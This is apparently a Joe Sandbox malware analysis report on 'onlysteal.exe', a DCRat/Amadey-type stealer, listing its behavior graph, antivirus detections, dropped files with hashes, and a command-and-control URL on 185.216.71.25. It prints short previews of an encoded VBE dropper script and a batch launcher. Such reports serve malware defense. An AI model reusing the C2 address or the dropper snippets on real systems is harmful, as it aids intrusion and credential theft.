                                  behaviorgraph top1 signatures2 2 Behavior Graph ID: 1583653 Sample: onlysteal.exe Startdate: 03/01/2025 Architecture: WINDOWS Score: 100 85 Suricata IDS alerts for network traffic 2->85 87 Found malware configuration 2->87 89 Antivirus detection for dropped file 2->89 91 13 other signatures 2->91 14 onlysteal.exe 3 6 2->14         started        process3 file4 77 C:\Intorefnet\hyperBlockCrtCommon.exe, PE32 14->77 dropped 79 C:\Intorefnet\wF0tJ2zNcmafpzDn9Ons.vbe, data 14->79 dropped 17 wscript.exe 1 14->17         started        process5 signatures6 83 Windows Scripting host queries suspicious COM object (likely to drop second stage) 17->83 20 cmd.exe 1 17->20         started        process7 process8 22 hyperBlockCrtCommon.exe 3 18 20->22         started        26 conhost.exe 20->26         started        file9 63 C:\Users\user\Desktop\vmGXvtnF.log, PE32 22->63 dropped 65 C:\Users\user\Desktop\plugneHL.log, PE32 22->65 dropped 67 C:\Users\...\IadHSrMxJwYAMPkyRTLDEKgeW.exe, PE32 22->67 dropped 69 5 other malicious files 22->69 dropped 95 Antivirus detection for dropped file 22->95 97 Multi AV Scanner detection for dropped file 22->97 99 Machine Learning detection for dropped file 22->99 101 2 other signatures 22->101 28 cmd.exe 1 22->28         started        signatures10 process11 signatures12 103 Uses ping.exe to sleep 28->103 105 Uses ping.exe to check the status of other devices and networks 28->105 31 SgrmBroker.exe 14 8 28->31         started        35 conhost.exe 28->35         started        37 PING.EXE 1 28->37         started        39 chcp.com 1 28->39         started        process13 dnsIp14 81 185.216.71.25, 49377, 49430, 49431 CLOUDCOMPUTINGDE Germany 31->81 57 C:\Users\user\Desktop\wYGfctxY.log, PE32 31->57 dropped 59 C:\Users\user\Desktop\BUHwkZnR.log, PE32 31->59 dropped 61 C:\Users\user\AppData\...\zuhvZR4ed0.bat, DOS 31->61 dropped 41 cmd.exe 1 31->41         started        file15 process16 process17 43 SgrmBroker.exe 41->43         started        46 w32tm.exe 1 41->46         started        48 conhost.exe 41->48         started        50 chcp.com 1 41->50         started        file18 71 C:\Users\user\Desktop\RpedHXOW.log, PE32 43->71 dropped 73 C:\Users\user\Desktop\DYEovgjB.log, PE32 43->73 dropped 75 C:\Users\user\AppData\...\szcAPjpm25.bat, DOS 43->75 dropped 52 cmd.exe 43->52         started        process19 signatures20 93 Uses ping.exe to sleep 52->93 55 conhost.exe 52->55         started        process21

                                  Screenshots

                                  Thumbnails

                                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                  windows-stand

                                  Antivirus, Machine Learning and Genetic Malware Detection

                                  Initial Sample

                                  SourceDetectionScannerLabelLink
                                  onlysteal.exe71%ReversingLabsWin32.Trojan.Amadey
                                  onlysteal.exe76%VirustotalBrowse
                                  onlysteal.exe100%AviraVBS/Runner.VPG
                                  onlysteal.exe100%Joe Sandbox ML

                                  Dropped Files

                                  SourceDetectionScannerLabelLink
                                  C:\Users\user\Desktop\BUHwkZnR.log100%AviraTR/PSW.Agent.qngqt
                                  C:\Intorefnet\wF0tJ2zNcmafpzDn9Ons.vbe100%AviraVBS/Runner.VPG
                                  C:\Users\user\Desktop\DYEovgjB.log100%AviraTR/PSW.Agent.qngqt
                                  C:\Users\user\Desktop\wYGfctxY.log100%AviraTR/AVI.Agent.updqb
                                  C:\Users\user\Desktop\kzbsFheO.log100%AviraTR/PSW.Agent.qngqt
                                  C:\ProgramData\smss.exe100%AviraHEUR/AGEN.1309961
                                  C:\Users\user\Desktop\FPzqkKvM.log100%AviraTR/AVI.Agent.updqb
                                  C:\Intorefnet\IadHSrMxJwYAMPkyRTLDEKgeW.exe100%AviraHEUR/AGEN.1309961
                                  C:\Users\user\Desktop\RpedHXOW.log100%AviraTR/AVI.Agent.updqb
                                  C:\Users\user\AppData\Local\Temp\zuhvZR4ed0.bat100%AviraBAT/Delbat.C
                                  C:\Users\user\Desktop\zVMHRGyj.log100%AviraTR/AVI.Agent.updqb
                                  C:\Users\user\Desktop\plugneHL.log100%AviraTR/AVI.Agent.updqb
                                  C:\Users\user\Desktop\AchrHOgY.log100%AviraTR/PSW.Agent.qngqt
                                  C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe100%AviraHEUR/AGEN.1309961
                                  C:\Intorefnet\IadHSrMxJwYAMPkyRTLDEKgeW.exe100%AviraHEUR/AGEN.1309961
                                  C:\Users\user\AppData\Local\Temp\fmCyxdZe80.bat100%AviraBAT/Delbat.C
                                  C:\Users\user\AppData\Local\Temp\szcAPjpm25.bat100%AviraBAT/Delbat.C
                                  C:\Users\user\Desktop\vmGXvtnF.log100%AviraTR/PSW.Agent.qngqt
                                  C:\Intorefnet\IadHSrMxJwYAMPkyRTLDEKgeW.exe100%AviraHEUR/AGEN.1309961
                                  C:\Users\user\AppData\Local\Temp\Y6Uf3masa9.bat100%AviraBAT/Delbat.C
                                  C:\Intorefnet\hyperBlockCrtCommon.exe100%AviraHEUR/AGEN.1309961
                                  C:\Users\user\AppData\Local\Temp\1dc23k5BXS.bat100%AviraBAT/Delbat.C
                                  C:\Users\user\Desktop\BUHwkZnR.log100%Joe Sandbox ML
                                  C:\Users\user\Desktop\DYEovgjB.log100%Joe Sandbox ML
                                  C:\Users\user\Desktop\kzbsFheO.log100%Joe Sandbox ML
                                  C:\ProgramData\smss.exe100%Joe Sandbox ML
                                  C:\Intorefnet\IadHSrMxJwYAMPkyRTLDEKgeW.exe100%Joe Sandbox ML
                                  C:\Users\user\Desktop\AchrHOgY.log100%Joe Sandbox ML
                                  C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe100%Joe Sandbox ML
                                  C:\Intorefnet\IadHSrMxJwYAMPkyRTLDEKgeW.exe100%Joe Sandbox ML
                                  C:\Users\user\Desktop\vmGXvtnF.log100%Joe Sandbox ML
                                  C:\Intorefnet\IadHSrMxJwYAMPkyRTLDEKgeW.exe100%Joe Sandbox ML
                                  C:\Intorefnet\hyperBlockCrtCommon.exe100%Joe Sandbox ML
                                  C:\Intorefnet\IadHSrMxJwYAMPkyRTLDEKgeW.exe83%ReversingLabsByteCode-MSIL.Backdoor.DCRat
                                  C:\Intorefnet\hyperBlockCrtCommon.exe83%ReversingLabsByteCode-MSIL.Backdoor.DCRat
                                  C:\Program Files (x86)\Internet Explorer\SIGNUP\IadHSrMxJwYAMPkyRTLDEKgeW.exe83%ReversingLabsByteCode-MSIL.Backdoor.DCRat
                                  C:\ProgramData\smss.exe83%ReversingLabsByteCode-MSIL.Backdoor.DCRat
                                  C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe83%ReversingLabsByteCode-MSIL.Backdoor.DCRat
                                  C:\Users\Default\Saved Games\IadHSrMxJwYAMPkyRTLDEKgeW.exe83%ReversingLabsByteCode-MSIL.Backdoor.DCRat
                                  C:\Users\user\Desktop\AchrHOgY.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                  C:\Users\user\Desktop\BUHwkZnR.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                  C:\Users\user\Desktop\DYEovgjB.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                  C:\Users\user\Desktop\FPzqkKvM.log50%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                  C:\Users\user\Desktop\RpedHXOW.log50%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                  C:\Users\user\Desktop\kzbsFheO.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                  C:\Users\user\Desktop\plugneHL.log50%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                  C:\Users\user\Desktop\vmGXvtnF.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                  C:\Users\user\Desktop\wYGfctxY.log50%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                  C:\Users\user\Desktop\zVMHRGyj.log50%ReversingLabsByteCode-MSIL.Trojan.DCRat

                                  Unpacked PE Files

                                  No Antivirus matches

                                  Domains

                                  No Antivirus matches

                                  URLs

                                  SourceDetectionScannerLabelLink
                                  http://185.216.71.25/0%Avira URL Cloudsafe
                                  http://185.216.71.250%Avira URL Cloudsafe
                                  http://185.216.71.25/PollgeoprocessorprotectbasewordpresswpLocal.php0%Avira URL Cloudsafe
                                  http://185.216.71.25puW0%Avira URL Cloudsafe

                                  Domains and IPs

                                  Contacted Domains

                                  No contacted domains info

                                  Contacted URLs

                                  NameMaliciousAntivirus DetectionReputation
                                  http://185.216.71.25/PollgeoprocessorprotectbasewordpresswpLocal.phptrue
                                  • Avira URL Cloud: safe
                                  		unknown

                                  URLs from Memory and Binaries

                                  NameSourceMaliciousAntivirus DetectionReputation
                                  http://185.216.71.25SgrmBroker.exe, 0000000B.00000002.2481310656.00000000023A1000.00000004.00000800.00020000.00000000.sdmp, SgrmBroker.exe, 00000011.00000002.2759463627.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, SgrmBroker.exe, 00000016.00000002.3073228459.00000000027A1000.00000004.00000800.00020000.00000000.sdmp, SgrmBroker.exe, 0000001B.00000002.3344471493.0000000002D63000.00000004.00000800.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://185.216.71.25puWSgrmBroker.exe, 0000000B.00000002.2481310656.00000000023A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namehyperBlockCrtCommon.exe, 00000005.00000002.2165352874.0000000003390000.00000004.00000800.00020000.00000000.sdmp, SgrmBroker.exe, 0000000B.00000002.2481310656.00000000023A1000.00000004.00000800.00020000.00000000.sdmp, SgrmBroker.exe, 00000011.00000002.2759463627.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, SgrmBroker.exe, 00000016.00000002.3073228459.00000000027A1000.00000004.00000800.00020000.00000000.sdmp, SgrmBroker.exe, 0000001B.00000002.3344471493.0000000002D63000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://185.216.71.25/SgrmBroker.exe, 0000001B.00000002.3344471493.0000000002D63000.00000004.00000800.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: safe
                                    		unknown

                                    World Map of Contacted IPs

                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs

                                    Public IPs

                                    IPDomainCountryFlagASNASN NameMalicious
                                    185.216.71.25
                                    		unknownGermany
                                    		43659CLOUDCOMPUTINGDEtrue

                                    General Information

                                    Joe Sandbox version:41.0.0 Charoite
                                    Analysis ID:1583653
                                    Start date and time:2025-01-03 09:09:05 +01:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 7m 40s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                    Number of analysed new started processes analysed:28
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:onlysteal.exe
                                    Detection:MAL
                                    Classification:mal100.troj.evad.winEXE@45/39@0/1
                                    EGA Information:
                                    • Successful, ratio: 100%
                                    HCA Information:
                                    • Successful, ratio: 91%
                                    • Number of executed functions: 249
                                    • Number of non-executed functions: 109
                                    Cookbook Comments:
                                    • Found application associated with file extension: .exe

                                    Warnings

                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                    • Excluded IPs from analysis (whitelisted): 13.107.246.45, 52.149.20.212, 172.202.163.200
                                    • Excluded domains from analysis (whitelisted): d.8.0.a.e.e.f.b.0.0.0.0.0.0.0.0.5.0.0.0.0.0.8.0.0.3.0.1.3.0.6.2.ip6.arpa, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                    • Report size getting too big, too many NtReadVirtualMemory calls found.

                                    Simulations

                                    Behavior and APIs

                                    TimeTypeDescription
                                    03:11:00API Interceptor2x Sleep call for process: SgrmBroker.exe modified

                                    Joe Sandbox View / Context

                                    IPs

                                    No context

                                    Domains

                                    No context

                                    ASNs

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    CLOUDCOMPUTINGDEWC2SD38tcf.exeGet hashmaliciousStealcBrowse
                                    • 185.216.71.4
                                    hidakibest.arm6.elfGet hashmaliciousGafgyt, MiraiBrowse
                                    • 185.216.71.152
                                    hidakibest.ppc.elfGet hashmaliciousGafgyt, MiraiBrowse
                                    • 185.216.71.152
                                    hidakibest.mips.elfGet hashmaliciousGafgyt, MiraiBrowse
                                    • 185.216.71.152
                                    hidakibest.x86.elfGet hashmaliciousMirai, GafgytBrowse
                                    • 185.216.71.152
                                    hidakibest.arm5.elfGet hashmaliciousGafgyt, MiraiBrowse
                                    • 185.216.71.152
                                    hidakibest.arm4.elfGet hashmaliciousGafgyt, MiraiBrowse
                                    • 185.216.71.152
                                    hidakibest.mpsl.elfGet hashmaliciousGafgyt, MiraiBrowse
                                    • 185.216.71.152
                                    hidakibest.arm7.elfGet hashmaliciousGafgyt, MiraiBrowse
                                    • 185.216.71.152
                                    hidakibest.sparc.elfGet hashmaliciousGafgyt, MiraiBrowse
                                    • 185.216.71.152

                                    JA3 Fingerprints

                                    No context

                                    Dropped Files

                                    No context

                                    Created / dropped Files

                                    C:\Intorefnet\853308c8279864

                                    Download File
                                    Process:C:\Intorefnet\hyperBlockCrtCommon.exe
                                    File Type:ASCII text, with very long lines (913), with no line terminators
                                    Category:dropped
                                    Size (bytes):913
                                    Entropy (8bit):5.918326214196409
                                    Encrypted:false
                                    SSDEEP:24:mJaSWydsYN37Te1Uqwx5wAeS5sq8VuzM0:mYS4YNLQwx5wAVsMzM0
                                    MD5:C3428824BB235BDDDAC09D2C527725F1
                                    SHA1:24E8AA4A560275DF2064564D347121A0BCD6213F
                                    SHA-256:1CD013A64D15DBA02D8A57D0701D3A23D708B5E2C8FE7E8260D2DA858EF8D140
                                    SHA-512:E4B5F8E158D588BA76A03C1A78FCA1EC17504AE8C19CACE4116A6709ACBC178321722A496AA73CFA5207F4918E69DD46C2F489618533A520BB16105C5439D84A
                                    Malicious:false
                                    Preview:VTFogWQvb3WlqDEschIrgd2WaaSrNULob8JhixaWjlzTo58a6bklPYY1asNGEihGssJr3hJoHwH4njrfb2vvtjYDkRH0jTSADsk5vRgZS5edQeO1BsoLxwXIUGGmZTExeG048wtKWVdyF5wGDPy1pGNRVclpK3980q9KnT2O8ezbTiCYTAjJeNIX3jigLEAcWf7Y6mcuXk3LQv8xZMWJUzdnilREuWD4dXFykocrhzw4T6HHkvG8r0IgBUzVUY9Bg9r3qKMvtolfCiUldKd8PFMnOiwQyHWJzvYUPNaajVODOmddAO1K5AvbxDoHX57mScpRK9WPtCZ30IYlFTQkQLOy97gLjSDnYmuw7MSA1lb2l2lopCCEpXVGO1RMdKqa9vfNYmo2AQsouVNHW2ggQ88BRnhF4Ghr4A2zWXQCXKEYoqW3oK0knKKAxe5uFi84tAutcXu8meIG4jWkRobuP6Eu01C2cf7zLJpo6maQZ28JBEGNHVcaHNow593kV1gGgT4u4rnoNKUX85twvyuGCgs8e2s6tz5hW1msKVTaryN63RyAQHzgHZEAl5PB9q5XPwBGSBlafUZOTvENEsqmAZa6xmGOFRaA2zrGQrsPfYAwAzqz1C7RASWzWETp4XUN3YVdE86W9bHlYn686QXCUJ9kc1uMYCUHEx3ldMv2GlRjLubsIVtnAR3tYvBMOu77G9hkuUetfe6t2aZrZBDDSrHw3JMrLioVnTdLN07x0AIfVJ08WTxMq3pY2vrlIwi60kFj7OeiDQNSjlauSOV1vbptoESbJWpDcLpuDRBIzOIaqXzQU7S4bqLY5W525CZrlKzX6qqBNNBgTODQOBHMDvmv9RzrWIMwzbzghbUoQRrNpoEqSon35Mn0hEXp08pEAOr2Zhtxrc5wDYGVM

                                    C:\Intorefnet\IadHSrMxJwYAMPkyRTLDEKgeW.exe

                                    Download File
                                    Process:C:\Intorefnet\hyperBlockCrtCommon.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):689664
                                    Entropy (8bit):5.558791715418654
                                    Encrypted:false
                                    SSDEEP:12288:exT1OIVnGV9J3I3SyKnUqIh5jiXPrQfkXmm1RhdLB9XFy+Bm67+:exJMVI3SyKnUh9E1bm67+
                                    MD5:88475FFCF70BAFDA27644064BD214F2A
                                    SHA1:650DEB8EEE1F3614FF924C2AC5DAD5A2F230DCE1
                                    SHA-256:F2BD4F56C501098299B88CEFECFD79E763D95D801016EAAF4E2707C5FFC7C767
                                    SHA-512:C3E7C4D38D43571FD81926AECF3F0BD75F728F1E7056AF02955EED96BEA67EFD30F295089300DF809841C0565A9EA4AA793E2F5C6B93E3EB86132CCCC267376F
                                    Malicious:true
                                    Yara Hits:
                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Intorefnet\IadHSrMxJwYAMPkyRTLDEKgeW.exe, Author: Joe Security
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 83%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.........."......~............... ........@.. ..............................qX....@.....................................K.......p............................................................................ ............... ..H............text....}... ...~.................. ..`.rsrc...p...........................@..@.reloc..............................@..B.......................H.......T...l...........................................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                                    C:\Intorefnet\Te60v9QbFjSF8KEQUR.bat

                                    Download File
                                    Process:C:\Users\user\Desktop\onlysteal.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):84
                                    Entropy (8bit):5.0994202926105725
                                    Encrypted:false
                                    SSDEEP:3:2dvHHjLjaHmKQQDLhKGZRmLLVAjA:2dvHHTKgG+LO8
                                    MD5:7FEF6D8E0A11E2DEC6AF7A0E3B952B06
                                    SHA1:B95534ABB31712B49087005DA4CDD4C92FE35EDD
                                    SHA-256:6BB327123F7EC740BB03B3405C5CD790199BA132091D1CEAE4F098A29C0E9592
                                    SHA-512:2C19D8AC297E3E0D790F844AEDAC3BE3934A274BA834B66F36994CCDFD8E8C49B836D7A0DF1E28DE999CEC7E1B5984A90199F4E08BC30D8113C4852FB9A27703
                                    Malicious:false
                                    Preview:%vcyLdZDYcrUTV%%rEzZNNVh%..%VAMCshwUC%"C:\Intorefnet/hyperBlockCrtCommon.exe"%udzTq%

                                    C:\Intorefnet\hyperBlockCrtCommon.exe

                                    Download File
                                    Process:C:\Users\user\Desktop\onlysteal.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):689664
                                    Entropy (8bit):5.558791715418654
                                    Encrypted:false
                                    SSDEEP:12288:exT1OIVnGV9J3I3SyKnUqIh5jiXPrQfkXmm1RhdLB9XFy+Bm67+:exJMVI3SyKnUh9E1bm67+
                                    MD5:88475FFCF70BAFDA27644064BD214F2A
                                    SHA1:650DEB8EEE1F3614FF924C2AC5DAD5A2F230DCE1
                                    SHA-256:F2BD4F56C501098299B88CEFECFD79E763D95D801016EAAF4E2707C5FFC7C767
                                    SHA-512:C3E7C4D38D43571FD81926AECF3F0BD75F728F1E7056AF02955EED96BEA67EFD30F295089300DF809841C0565A9EA4AA793E2F5C6B93E3EB86132CCCC267376F
                                    Malicious:true
                                    Yara Hits:
                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Intorefnet\hyperBlockCrtCommon.exe, Author: Joe Security
                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Intorefnet\hyperBlockCrtCommon.exe, Author: Joe Security
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 83%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.........."......~............... ........@.. ..............................qX....@.....................................K.......p............................................................................ ............... ..H............text....}... ...~.................. ..`.rsrc...p...........................@..@.reloc..............................@..B.......................H.......T...l...........................................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                                    C:\Intorefnet\wF0tJ2zNcmafpzDn9Ons.vbe

                                    Download File
                                    Process:C:\Users\user\Desktop\onlysteal.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):206
                                    Entropy (8bit):5.793981930782848
                                    Encrypted:false
                                    SSDEEP:6:GmgwqK+NkLzWbH9WF08nZNDd3RL1wQJRFVqagNM:GmBMCzWL74d3XBJDVZ
                                    MD5:926C428EAA357B6FF5474252EE2821FE
                                    SHA1:623205127383F9CC804A3AF035448CC396E704E3
                                    SHA-256:80675C3AE85F284B0E291B368560CC5727D416F1F52577E6505DB41B0ADD9BC1
                                    SHA-512:CDB460848EDBC5B8053B0B5211FCE7D5F5EB92B347526B3E1D98BECBFE1D4F8FB277AC3C58EAB64B532F57C4C3B6F5642A9FAD04C22F2910EECB0633079FB4AC
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    Preview:#@~^tQAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2v*T!Zb@#@&j.Y,./4?4nV^PxP;DnCD+r(%+1Y`r.jmMkaY ?4n^VE#@#@&.ktj4.VV ]!x~J;lJqUDWM+0.+D&z:+.!7,}8wL?w0|Apj" 8lDJBPT~~WmVd+czgAAA==^#~@.

                                    C:\Program Files (x86)\Internet Explorer\SIGNUP\853308c8279864

                                    Download File
                                    Process:C:\Intorefnet\hyperBlockCrtCommon.exe
                                    File Type:ASCII text, with very long lines (931), with no line terminators
                                    Category:dropped
                                    Size (bytes):931
                                    Entropy (8bit):5.911276293867402
                                    Encrypted:false
                                    SSDEEP:12:XuPIjoLhBcIlL/G57sxS861wnqMRnxPt9IKsK8qTkMw43gScjFcyDvl6qn:X/jO3cc/GSxn6mqMlyK7TS43YhPrcc
                                    MD5:29E151CCF69A0E2A1E0326245CEE2F4B
                                    SHA1:7A5FE8116CCAF6F924F1828017CDD162C2EF69C7
                                    SHA-256:A0B98A8AE23FC1F1D4B41D8A229BC508387BA0AB1F6261BC0D419D7A001165F0
                                    SHA-512:34A7DD43F3CB0933983156D01F99A172B419BF7F356F8991A8FED6CF9457D6016ECD7AB4CDA290DF0D3EC0F17D397ADFDA3C09ED51B8D53432F2CEAAC677B881
                                    Malicious:false
                                    Preview:1N629V8IvxglV9AVHDQXonP04Q4UPAAmIRCFxLAAdiGaXjQO4IUFsdRN7G7tbn3uw4cD74h6CQ3GhzcV9paHq43pAyHrNQizoVndGMR9kYCcjLqInmtvNvE1AxDIwzswrDbLM9PxYagR2bFyI9Dlgxm3RvcSIJMvpQufuf6oX6XwPw9jrP9xvHP4bh3ag6pPNvmmqkEnDZOkZzoev3l3JZ9iA0EMlfHaQIidKW2HKWuW3oel3ZonVvFywDm0f2BhRxTRQKUYAdswpmoVVcSM0eFeCurGuClSVMEGUNVtEQn1DTIJZQeDjzqxrzPgdOn72abdiiAIHjHk1ObsmirehhtffQYf8yQ0mp8m2ok0PW6ArF6cXg35gJZUr57RJfJSTR8LQz0770PLltyZU6Ic5VTcPo56rTquMnqZHvMip57q4Ot8Gh7NWrX87f6l34PnJe87CYSjukw9XniA470KWdXeQsclzkovpUgZQv5sOYdw4XlT75r6DFRpHdrT6quJ5BTCHJuJBH58Alk2HIo33srkC0SwDmvhnT03EiMyKh45KTpf3yMxC0QMUt9Q07FZWXUruqyi50tWxvZtLw3PZ7fxDniVi57Nbfjw97uM9n2MH3ZjTQFDD09Y2gnGHd993f4SLmuNCqPvFTqJO9BS03JlfL4cUnEgn2Sl9GXqf2BWkOSi0e2IbrJ9WTw9sR3YmtHNAEKHmVx71wAR3Wmzv6E6sTPpTX8N9nu1GFivUufG3LIjTfGVpDmpoLerzeyOWj8NBIKyy1fBa8CgLqWxRmi6AFN5k05z6RtUN4hKVShxhlOqI8gJIA6uBCN65PO75qFJOsTRILc9FuYZ0gxmUwq5U9TKrkPGEk20gFbaoPA7h7oQnxGYclmIAJyOZIjh5W4f2i3uFW7FvtYXUCh3e1nc7t0WRMAgpdB

                                    C:\Program Files (x86)\Internet Explorer\SIGNUP\IadHSrMxJwYAMPkyRTLDEKgeW.exe

                                    Download File
                                    Process:C:\Intorefnet\hyperBlockCrtCommon.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):689664
                                    Entropy (8bit):5.558791715418654
                                    Encrypted:false
                                    SSDEEP:12288:exT1OIVnGV9J3I3SyKnUqIh5jiXPrQfkXmm1RhdLB9XFy+Bm67+:exJMVI3SyKnUh9E1bm67+
                                    MD5:88475FFCF70BAFDA27644064BD214F2A
                                    SHA1:650DEB8EEE1F3614FF924C2AC5DAD5A2F230DCE1
                                    SHA-256:F2BD4F56C501098299B88CEFECFD79E763D95D801016EAAF4E2707C5FFC7C767
                                    SHA-512:C3E7C4D38D43571FD81926AECF3F0BD75F728F1E7056AF02955EED96BEA67EFD30F295089300DF809841C0565A9EA4AA793E2F5C6B93E3EB86132CCCC267376F
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 83%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.........."......~............... ........@.. ..............................qX....@.....................................K.......p............................................................................ ............... ..H............text....}... ...~.................. ..`.rsrc...p...........................@..@.reloc..............................@..B.......................H.......T...l...........................................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                                    C:\ProgramData\69ddcba757bf72

                                    Download File
                                    Process:C:\Intorefnet\hyperBlockCrtCommon.exe
                                    File Type:ASCII text, with very long lines (828), with no line terminators
                                    Category:dropped
                                    Size (bytes):828
                                    Entropy (8bit):5.888719443812523
                                    Encrypted:false
                                    SSDEEP:24:Y0vf/uyDN/jtm6xFF1PRFTOIuGZBhu8AatM:Y0PhN/jwG8GZBhpAAM
                                    MD5:56CAF2169525EEC1362D046FEF49BB96
                                    SHA1:61D2635C0C2EF17FBD28DC086F582D61A7DC2979
                                    SHA-256:A73E886869C129587BFF015D5FC25B1B87227B6E68C257631AB6F1810DE9EF9E
                                    SHA-512:0CB36778EFBDC39B0ED3EFDD8A03EB3AFF7117E9C04F7A88E9714223E436AC0D51CE3F497D2B94D3F418A90709502A058C7EE1D51AF0889B396F6DB0E7E63D3B
                                    Malicious:false
                                    Preview:K25yb3Ytx2EF7JiETzkNaanLjbzXNQyBfVLHtPGYcu6z3bvDNG59f7YuOtP9DBfgECjl7aVDsLuqdxSHqvJGVzgi7b299GUbPZv02JGwv1QTMrQabITS1YLPgAogiWDm0TaDCcPgpWVeiMWPKbi1xCj1OfT1fjOZxod2QNY92xmeCqqToYVGyMyyujygIYAFI6r4te87Di8AZEyhzAMHOHkl0oHrY21exhWF9wkKZYDPNyYpuQrIL21AVFDEWRiKreN2ssiCZCrzDVXBPc6HLsT4pVu3sfxIz3hskg6BsosIKC7ArBz3Ub98LSMW8oT4Oj9Kxpbtf4YgAKtnYtMqq3xY3ihRTjDEVx3kCwMCkFXaCd8Ajj8ObmOVwlROHJZ61TKMQJllhJGkfXVZkgstlymsjiyaf74bqbisSvuZ8WrSgnzZQ1olapUDrcmrUKGjOo4EymHywSvOGUM6tYKoTTBAGfB0ICFyQID2tvlnuzyH4G7WQq85AcQ4m37TlQqtN777QTM8xg3df4FAiokcEJxy2JPzxSCdJF37J9G6d9IdiwZsy7u6pOpEJIFGEXKfeZUZAI0jio8EAUQFtgB0hFx5ZzyA391Gzm8Ib9sqGLYBPlDy29XiVU8YmZALTzpiw1OYVHnuyVtVrwpyv9I3mTufokgC9gWQgzOXWpduWmtAkmqztMaUrv6dGttvlluS8cz2hRbGgYh9ju5C3qSxGCju2uQn5sJu2bBHxyScuTyTO74Wyr24S7L63EAwAyKyPwHIsyOFY0CwOQf504zO0Oc4PFOsyfb6J9DbzvnAcwfc4ZsmiE5G857AUM2n

                                    C:\ProgramData\smss.exe

